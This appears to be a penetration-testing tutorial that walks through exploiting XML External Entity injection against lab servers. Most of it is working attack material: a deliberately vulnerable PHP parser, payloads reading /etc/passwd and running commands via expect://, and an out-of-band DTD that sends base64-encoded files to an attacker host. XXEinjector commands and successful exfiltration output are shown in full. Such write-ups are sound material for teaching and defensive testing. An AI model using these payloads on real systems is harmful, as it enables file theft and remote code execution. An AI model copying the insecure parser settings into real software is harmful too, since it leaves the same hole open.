Exploitation: XML External Entity (XXE) Injection

During the course of our assessments, we sometimes come across a vulnerability that allows us to carry out XML eXternal Entity (XXE) Injection attacks. XXE Injection is a type of attack against an application that parses XML input. Although this is a relatively esoteric vulnerability compared to other web application attack vectors, like Cross-Site Request Forgery (CSRF), we make the most of this vulnerability when it comes up, since it can lead to extracting sensitive data, and even Remote Code Execution (RCE) in some cases. We’ll go over setting up a basic PHP server that is vulnerable, exploiting the vulnerability manually, then move onto a handy tool called XXEInjector to help automate the process.

We will also go through discovering the vulnerability with Burp. There are a couple of playgrounds we’ll be using. The first is a simple PHP server, while the other is a virtual machine running a vulnerable Django web application.

Setup

Before going into more detail regarding this attack, it may be helpful to understand how a web application interacts with an XML document in a manner that causes such an attack vector to arise. We’ve set up a virtual machine with a simple PHP server that utilizes an XML document to validate credentials.

This virtual machine, our first playground, is running Ubuntu 14.04.5 and PHP 5 on Apache. We used the following script to set up a PHP endpoint that parses XML input. You will also need the php-xml module installed in order for XML parsing to work (and restart the Apache server after installation).

<?php 
    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You have logged in as user $user";
?>

The above script [3] is served when a request to /xml_injectable.php is made.

<creds>
    <user>Ed</user>
    <pass>mypass</pass>
</creds>

The four lines above are expected input to the aforementioned PHP endpoint, and they are stored in an XML file called xml.txt. This file is used as POST data via CURL:

curl -d @xml.txt http://localhost/xml_injectable.php

The server responds with:

You have logged in as user Ed

Proof of Concept

The most interesting aspect of parsing XML input files is that they can contain code that points to a file on the server itself. This is an example of an external entity. In a bit, we’ll go over the full scope of what external entities can be, including files hosted on the web via FTP and HTTP.

Let’s modify the xml.txt file to contain the following code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Notice the bolded items. After sending the request with the above as POST data, the victim server will respond with its own /etc/passwd:

You have logged in as user root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

To reiterate, the XML input file that we provided (xml.txt) contains code to tell the server to look for the external entity, file:///etc/passwd, and then inject the contents into the “user” field. The last line of the PHP script then echoes back the goods.

Remote Code Execution

If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE. Let’s modify the payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

The response from the server will be something like:

You have logged in as user uid=0(root) gid=0(root) groups=0(root)

Instances where RCE is possible via XXE are rare, so let’s move onto a more common scenario: using a tool to help us automate the process of extracting data instead.

Automated XXE Injection using Burp and XXEinjector [2]

Let’s switch to our second playground [1] to help the reader follow along more easily. This is a TurnKey Linux virtual machine that is running a Django web application which is vulnerable to XXEi. In a real-world pentesting scenario, we’re most likely to use tools rather than manually exploiting a vulnerability, so let’s incorporate one of my favorite web application assessment tools as well: Burp.

I) Set up the VM

Simply extract and run the VM configuration file (.vmx). There is a readme file included in the download to help you set up a private network to your machine.

II) Set up Burp

Burp acts as a proxy between your machine and the target machine. It helps with inspecting, modifying, and scanning application-level requests and responses. The scanner that comes with Burp Pro is powerful when used mindfully.

III) Scan the vulnerable form

The VM server has a vulnerable form served at /static/mailingList.html. The form POSTS to /blog/newRegistration. Input some junk values and fire off a Burp scan. It is not required to scan the form; we simply need a sample request for XXEinjector to use later on.

Burp should light up with the XXE vulnerability, along with some reflected XSS as a bonus. When we examine the XXE vulnerability, we get this advisory.

Figure 1: XXE Advisory

figure_1.png#asset:506:url

 

In fact, the professional version of Burp will go far enough to use Burp Collaborator, an external service that Burp can use to help with discovering vulnerabilities or exploiting targets. Basically, the Collaborator requests that Burp sends to the vulnerable application are designed to call out to Burp Collaborator via both DNS resolution and web requests, which, if successful, will inform your Burp instance that the target machine executed the malicious payload. Most vulnerabilities can be discovered by examining or timing the response, but sometimes, using an external service like Burp Collaborator can take things to the next level. In this case, Burp pulled the /etc/passwd file itself, but it also used Burp Collaborator to prove to us that the application reached out to an external server to pull a string.

Figure 2: /etc/passwd file

xxe_figure_2.png#asset:507:url

The following images showcase how Burp used Collaborator.

 

Figure 3: Request to Reach Out to Collaborator

xxe_figure_3.png#asset:508:url

 

Figure 4: Collaborator Responds with String

xxe_figure_4.png#asset:509:url

 

Figure 5: Application Uses String from Collaborator Response, Proving XXEi Is Possible

xxe_figure_5.png#asset:510

 

In order to get finer control over the XXE Injection process, let’s use XXEinjector. We will need the unmolested version of the request. We’ll store this in a file called request.txt.

Figure 6: Burp Request with Malicious Content

xxe_figure_6.png#asset:511

 

Figure 7: Unmolested Request

xxe_figure_7.png#asset:512

 

How Does XXEinjector Work?

XXEinjector operates a bit differently, in comparison to Burp (excluding Collaborator). Notice that in the manual injection method (Proof of Concept section) along with the Burp approach, we rely on the fact that the server is ultimately echoing out the injected entity somehow. This is a luxury that we may not always have in a vulnerable application. In order to exploit an application that does not echo back results, we’ll have to resort to the out-of-band techniques that XXEinjector utilizes. Burp Collaborator is similar to XXEinjector in that they both utilize out-of-band techniques.

This technique requires that the application can connect to the attacker’s site, which means egress filtering comes into play when attacking externally. XXEinjector can enumerate egress ports for us, which is a nice feature to help in getting the tool to work. It is important to note that XXEinjector can be a bit finicky since the attack is more sophisticated than sending one request. We won’t be going through the egress busting process here, since it’s simply a flag that you pass to XXEinjector (–enumports).

XXEinjector Methodology

1) Send a malicious request that tells the remote server to call back, requesting a payload file named file.dtd. In that same request from XXEinjector, we call upon two other entities that can only be executed if file.dtd makes it to the victim webserver successfully, and is interpreted correctly. This is a huge part of why XXEinjector is finicky. For example, in order for this to work on our PHP server, which we’ll reexamine in a bit, we need to supply a flag to XXEinjector to encode our payload in base64. Base64 uses a restricted character set that won’t trip up interpreters in the process of executing the exploit (such as quotes), and it needs an extra decoding step in order for WAF/IDS/IPS to pick it up. This helps get the job done more robustly and quietly. The request looks something like this. Line of interest is bolded.

POST /xml_injectable.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 158
Host: 192.168.242.139
Content-Type: application/x-www-form-urlencoded
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>
<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>

There are three entities at play, “remote”, “int”, and “trick”. Only “remote” is defined in this request, and it is a URL from our attacker machine, where XXEinjector is running. The moment XXEinjector fires off this request, it starts a server on port 80 (can be changed), waiting to serve file.dtd.

2) The victim machine begins parsing the request, and substitutes “remote” for the contents of file.dtd (after reaching out to our attacker machine and grabbing it). File.dtd looks like the following (this is the whole file):

<!ENTITY % payl SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY % trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">

(That does not have to be on multiple lines, my attack strings were breaking the WYSIWYG editor)

Note how we define a new entity, “payl”, which is a URL to the file we’re trying to pull out. We then define the two missing entities from the previous request, “int” and “trick”. Note that “trick” is an entity defined within the other entity, “int”. Lastly, notice that this payload is not encoded. Some characters are encoded, due to the embedding of one entity within another, but the request itself is not base64 encoded.

3) Great, now we have all of our entities defined, so here comes the awesome part of this attack. Notice how in the “trick” entity definition, we’re substituting the contents of “payl” with the contents of /etc/passwd. That means all the victim server has to do is call back home, the server that XXEinjector is running, passing the contents of /etc/passwd as a parameter to that URL. The application does not need to echo back the contents of /etc/passwd in the response of the vulnerable application web form/page. It simply calls back home with the contents in that parameter. XXEinjector parses the parameter and saves it in a file. Done!

Practical Example

Alright so the theory is great, but when we get down to using the tool, we might (we will) run into some issues. Let’s go back to our first playground, the simple PHP server running with the xml_injectable.php script. We’ll be using this playground rather than the Django one, because we have more control over what gets echoed out. The second playground we used was a good example of a fire-and-forget server we pulled from a VM online, and then running Burp against it. Technically, we could modify the Django code, but modifying the small PHP script is easier. As a side note, Burp also picked up the same vulnerabilities against our smaller PHP environment.

Let’s modify the PHP script by commenting out irrelevant code and code that echoes things back.

<?php 
    libxml_disable_entity_loader (false); 
    $xmlfile = file_get_contents('php://input'); 
    $dom = new DOMDocument(); 
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    // $creds = simplexml_import_dom($dom); 
    // $user = $creds->user; 
    // $pass = $creds->pass; 
    // echo "You have logged in as user $user";
?>

So all we’re doing in that PHP script is literally loading the XML formatted request into a PHP object. We’re parsing the XML document/string into a PHP object.

Let’s fire off a sample XXEinjector request.

> sudo ruby XXEinjector.rb --host=192.168.240.1 --path=/etc/passwd
--file=phprequest.txt --proxy=192.168.240.1:8080 --oob=http --verbose

Flags:

–host: This is our machine’s IP. XXEinjector needs to know this in order to craft the request for the victim machine to call back home and grab file.dtd.

–path: Loot location.

–file: This contains the unmolested PHP request, with the exception of marking where we want XXEinjector to start injecting, using the string “XXEINJECT”. Anything under XXEINJECT is just what remains from our previous experiments and is relatively meaningless here. The contents of phprequest.txt follow:

POST /xml_injectable.php HTTP/1.1
Host: 192.168.242.139
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
XXEINJECT
<creds>
<user>blah</user>
<pass>mypass</pass>
</creds>

–proxy: This is not a mandatory flag. I’m simply proxying my requests through Burp to see what they look like. Alternately, use the –verbose flag (which I’m using in this request) to see exactly what request XXEinjector is making and what the file.dtd it’s using looks like.

–oob: Out-of-band flag. This is telling XXEinjector to utilize the http protocol in the file.dtd request for our victim’s machine to use when it inadvertently sends us back the goods of /etc/passwd. This is one of those finicky flags that you have to experiment with, because it depends on the environment you’re trying to exploit. Sometimes, certain protocols are not useable, or certain (most) egress ports are closed off. Experiment with –oob, –ftpport, –httpport, etc…

After firing off this request, we get the following output from XXEinjector, which is a sign of failure.

XXEinjector by Jakub PałaczyńskiDTD injected.
Enumeration locked.
Sending request with malicious XML:
http://192.168.242.139/xml_injectable.php 
{"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Connection"=>"close", "Upgrade-Insecure-Requests"=>"1", "Content-Length"=>"158"}

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM 
"http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>
<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>

Got request for XML:
GET /file.dtd HTTP/1.0

Responding with XML for: /etc/passwd
XML payload sent:
<!ENTITY % payl SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY % trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">


FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n

Due to the use of the verbose flag, we can see exactly what XXEinjector is doing. We can see that XXEinjector was successful in getting the victim server to call back for /file.dtd (bolded lines). However, near the end, the victim server did not send the goods back. What the hell?

Well, after examining our error log from Apache, we notice that our loadXML method wasn’t massaged satisfactorily in order to get it to spit out the goods.

[Sun Nov 06 09:10:46.145222 2016] [:error] [pid 1222] [client 192.168.242.1:64701] PHP Notice:  DOMDocument::loadXML(): PEReference: %int; not found in Entity, line: 1 in /var/www/html/xml_injectable.php on line 16
[Sun Nov 06 09:10:46.145257 2016] [:error] [pid 1222] [client 192.168.242.1:64701] PHP Notice:  DOMDocument::loadXML(): PEReference: %trick; not found in Entity, line: 1 in /var/www/html/xml_injectable.php on line 16

After some research into the semantics of XML and loadXML, I came to the realization that there was an encoding issue with how the resource file (/etc/passwd) is being specified. Fortunately, XXEinjector has a flag to encode that line, specifically tailored to keep PHP happy. We simply add the –phpfilter flag to our request.

> sudo ruby XXEinjector.rb --host=192.168.240.1 --path=/etc/passwd --file=phprequest.txt --proxy=192.168.240.1:8080 --oob=http --verbose --phpfilter

Executing this command results in the following:

XXEinjector by Jakub PałaczyńskiDTD injected.
Enumeration locked.
Sending request with malicious XML:
http://192.168.242.139/xml_injectable.php 
{"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Connection"=>"close", "Upgrade-Insecure-Requests"=>"1", "Content-Length"=>"158"}
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM"http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>

<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>
Got request for XML:
GET /file.dtd HTTP/1.0
Responding with XML for: /etc/passwd
XML payload sent:
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY % trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">
Response with file/directory content received:
GET /?p=cm9vdDp4OjA6M(rest of base64 encoded string) HTTP/1.0
Enumeration unlocked.
Successfully logged file: /etc/passwd
Nothing else to do. Exiting.

Upon checking, in our XXEinjector directory, Logs/<target_ip>/etc/passwd.log, we notice that our goods await.

Mission successful.